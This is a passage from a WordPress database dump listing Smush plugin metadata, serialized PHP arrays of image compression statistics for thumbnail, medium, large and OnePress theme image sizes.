000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1731;s:11:\"size_before\";i:10356;s:10:\"size_after\";i:8625;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:2795;s:11:\"size_before\";i:15713;s:10:\"size_after\";i:12918;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4395,1707,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.063056223375088649163444642908871173858642578125;s:5:\"bytes\";i:19027;s:11:\"size_before\";i:94836;s:10:\"size_after\";i:75809;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:448;s:11:\"size_before\";i:3737;s:10:\"size_after\";i:3289;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:969;s:11:\"size_before\";i:6476;s:10:\"size_after\";i:5507;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:4283;s:11:\"size_before\";i:20278;s:10:\"size_after\";i:15995;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.620000000000000994759830064140260219573974609375;s:5:\"bytes\";i:7525;s:11:\"size_before\";i:30568;s:10:\"size_after\";i:23043;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:851;s:11:\"size_before\";i:6195;s:10:\"size_after\";i:5344;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1901;s:11:\"size_before\";i:11245;s:10:\"size_after\";i:9344;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:3050;s:11:\"size_before\";i:16337;s:10:\"size_after\";i:13287;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4396,1706,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.0304953316709060118228080682456493377685546875;s:5:\"bytes\";i:20557;s:11:\"size_before\";i:120707;s:10:\"size_after\";i:100150;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:388;s:11:\"size_before\";i:4048;s:10:\"size_after\";i:3660;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:950;s:11:\"size_before\";i:7904;s:10:\"size_after\";i:6954;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4737;s:11:\"size_before\";i:26243;s:10:\"size_after\";i:21506;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:7974;s:11:\"size_before\";i:39036;s:10:\"size_after\";i:31062;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:881;s:11:\"size_before\";i:7765;s:10:\"size_after\";i:6884;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:2121;s:11:\"size_before\";i:14261;s:10:\"size_after\";i:12140;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:3506;s:11:\"size_before\";i:21450;s:10:\"size_after\";i:17944;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4397,1705,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.429696990732708172799902968108654022216796875;s:5:\"bytes\";i:17658;s:11:\"size_before\";i:86433;s:10:\"size_after\";i:68775;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:335;s:11:\"size_before\";i:2866;s:10:\"size_after\";i:2531;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:773;s:11:\"size_before\";i:5375;s:10:\"size_after\";i:4602;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4089;s:11:\"size_before\";i:18934;s:10:\"size_after\";i:14845;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:7251;s:11:\"size_before\";i:29539;s:10:\"size_after\";i:22288;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:684;s:11:\"size_before\";i:5013;s:10:\"size_after\";i:4329;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1635;s:11:\"size_before\";i:9440;s:10:\"size_after\";i:7805;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:2891;s:11:\"size_before\";i:15266;s:10:\"size_after\";i:12375;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4398,1704,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.7295822088752714762449613772332668304443359375;s:5:\"bytes\";i:18461;s:11:\"size_before\";i:98566;s:10:\"size_after\";i:80105;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:405;s:11:\"size_before\";i:3618;s:10:\"size_after\";i:3213;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:883;s:11:\"size_before\";i:6989;s:10:\"size_after\";i:6106;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:4231;s:11:\"size_before\";i:21111;s:10:\"size_after\";i:16880;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.35000000000000142108547152020037174224853515625;s:5:\"bytes\";i:7374;s:11:\"size_before\";i:31574;s:10:\"size_after\";i:24200;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.5;s:5:\"bytes\";i:835;s:11:\"size_before\";i:6681;s:10:\"size_after\";i:5846;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1799;s:11:\"size_before\";i:11718;s:10:\"size_after\";i:9919;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:2934;s:11:\"size_before\";i:16875;s:10:\"size_after\";i:13941;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4399,1703,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.609232470284712945840510656125843524932861328125;s:5:\"bytes\";i:18026;s:11:\"size_before\";i:108530;s:10:\"size_after\";i:90504;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:411;s:11:\"size_before\";i:3788;s:10:\"size_after\";i:3377;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:834;s:11:\"size_before\";i:6977;s:10:\"size_after\";i:6143;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4131;s:11:\"size_before\";i:23626;s:10:\"size_after\";i:19495;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:7303;s:11:\"size_before\";i:36323;s:10:\"size_after\";i:29020;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:711;s:11:\"size_before\";i:6657;s:10:\"size_after\";i:5946;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1812;s:11:\"size_before\";i:12669;s:10:\"size_after\";i:10857;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2824;s:11:\"size_before\";i:18490;s:10:\"size_after\";i:15666;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4400,1702,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.23013465971126834119786508381366729736328125;s:5:\"bytes\";i:19250;s:11:\"size_before\";i:90673;s:10:\"size_after\";i:71423;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:456;s:11:\"size_before\";i:3246;s:10:\"size_after\";i:2790;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:869;s:11:\"size_before\";i:5948;s:10:\"size_after\";i:5079;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.309999999999998721023075631819665431976318359375;s:5:\"bytes\";i:4412;s:11:\"size_before\";i:19774;s:10:\"size_after\";i:15362;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:7639;s:11:\"size_before\";i:29849;s:10:\"size_after\";i:22210;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:791;s:11:\"size_before\";i:5597;s:10:\"size_after\";i:4806;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:1884;s:11:\"size_before\";i:10360;s:10:\"size_after\";i:8476;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:3199;s:11:\"size_before\";i:15899;s:10:\"size_after\";i:12700;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4401,1701,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.882774656074406749439731356687843799591064453125;s:5:\"bytes\";i:19263;s:11:\"size_before\";i:77415;s:10:\"size_after\";i:58152;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:440;s:11:\"size_before\";i:3169;s:10:\"size_after\";i:2729;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:845;s:11:\"size_before\";i:5291;s:10:\"size_after\";i:4446;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.629999999999999005240169935859739780426025390625;s:5:\"bytes\";i:4429;s:11:\"size_before\";i:16632;s:10:\"size_after\";i:12203;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:7666;s:11:\"size_before\";i:24678;s:10:\"size_after\";i:17012;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:773;s:11:\"size_before\";i:4905;s:10:\"size_after\";i:4132;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:1919;s:11:\"size_before\";i:9324;s:10:\"size_after\";i:7405;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:3191;s:11:\"size_before\";i:13416;s:10:\"size_after\";i:10225;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4402,1700,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.52979857983587663738944684155285358428955078125;s:5:\"bytes\";i:18480;s:11:\"size_before\";i:72386;s:10:\"size_after\";i:53906;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:364;s:11:\"size_before\";i:2810;s:10:\"size_after\";i:2446;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.309999999999998721023075631819665431976318359375;s:5:\"bytes\";i:776;s:11:\"size_before\";i:4757;s:10:\"size_after\";i:3981;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:4334;s:11:\"size_before\";i:15706;s:10:\"size_after\";i:11372;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:7499;s:11:\"size_before\";i:24036;s:10:\"size_after\";i:16537;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:15;s:5:\"bytes\";i:668;s:11:\"size_before\";i:4452;s:10:\"size_after\";i:3784;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:1710;s:11:\"size_before\";i:8005;s:10:\"size_after\";i:6295;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:3129;s:11:\"size_before\";i:12620;s:10:\"size_after\";i:9491;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4403,1699,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.2277270751847026986069977283477783203125;s:5:\"bytes\";i:20537;s:11:\"size_before\";i:126555;s:10:\"size_after\";i:106018;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:512;s:11:\"size_before\";i:4772;s:10:\"size_after\";i:4260;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:996;s:11:\"size_before\";i:8507;s:10:\"size_after\";i:7511;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4690;s:11:\"size_before\";i:27619;s:10:\"size_after\";i:22929;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:8058;s:11:\"size_before\";i:40833;s:10:\"size_after\";i:32775;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:924;s:11:\"size_before\";i:7989;s:10:\"size_after\";i:7065;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2006;s:11:\"size_before\";i:14753;s:10:\"size_after\";i:12747;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3351;s:11:\"size_before\";i:22082;s:10:\"size_after\";i:18731;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4404,1698,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:26.95682235414729888134388602338731288909912109375;s:5:\"bytes\";i:22613;s:11:\"size_before\";i:83886;s:10:\"size_after\";i:61273;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:516;s:11:\"size_before\";i:3347;s:10:\"size_after\";i:2831;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:1160;s:11:\"size_before\";i:5947;s:10:\"size_after\";i:4787;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:4993;s:11:\"size_before\";i:17512;s:10:\"size_after\";i:12519;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.219999999999998863131622783839702606201171875;s:5:\"bytes\";i:9079;s:11:\"size_before\";i:27330;s:10:\"size_after\";i:18251;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.39999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1029;s:11:\"size_before\";i:5592;s:10:\"size_after\";i:4563;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:2178;s:11:\"size_before\";i:9863;s:10:\"size_after\";i:7685;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:3658;s:11:\"size_before\";i:14295;s:10:\"size_after\";i:10637;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4405,1697,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.79457200786307424777987762354314327239990234375;s:5:\"bytes\";i:19233;s:11:\"size_before\";i:97163;s:10:\"size_after\";i:77930;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:367;s:11:\"size_before\";i:3406;s:10:\"size_after\";i:3039;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.5;s:5:\"bytes\";i:774;s:11:\"size_before\";i:6191;s:10:\"size_after\";i:5417;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:4495;s:11:\"size_before\";i:21082;s:10:\"size_after\";i:16587;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:7747;s:11:\"size_before\";i:32312;s:10:\"size_after\";i:24565;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:683;s:11:\"size_before\";i:5852;s:10:\"size_after\";i:5169;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1917;s:11:\"size_before\";i:11161;s:10:\"size_after\";i:9244;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:3250;s:11:\"size_before\";i:17159;s:10:\"size_after\";i:13909;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4406,1696,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.1124535414394500776325003243982791900634765625;s:5:\"bytes\";i:18994;s:11:\"size_before\";i:94439;s:10:\"size_after\";i:75445;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:442;s:11:\"size_before\";i:3717;s:10:\"size_after\";i:3275;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:943;s:11:\"size_before\";i:6654;s:10:\"size_after\";i:5711;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:4284;s:11:\"size_before\";i:20260;s:10:\"size_after\";i:15976;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.280000000000001136868377216160297393798828125;s:5:\"bytes\";i:7464;s:11:\"size_before\";i:29521;s:10:\"size_after\";i:22057;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:832;s:11:\"size_before\";i:6394;s:10:\"size_after\";i:5562;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:1926;s:11:\"size_before\";i:11352;s:10:\"size_after\";i:9426;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.760000000000001563194018672220408916473388671875;s:5:\"bytes\";i:3103;s:11:\"size_before\";i:16541;s:10:\"size_after\";i:13438;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4407,1694,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.575446319393495997474019532091915607452392578125;s:5:\"bytes\";i:20244;s:11:\"size_before\";i:85869;s:10:\"size_after\";i:65625;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_v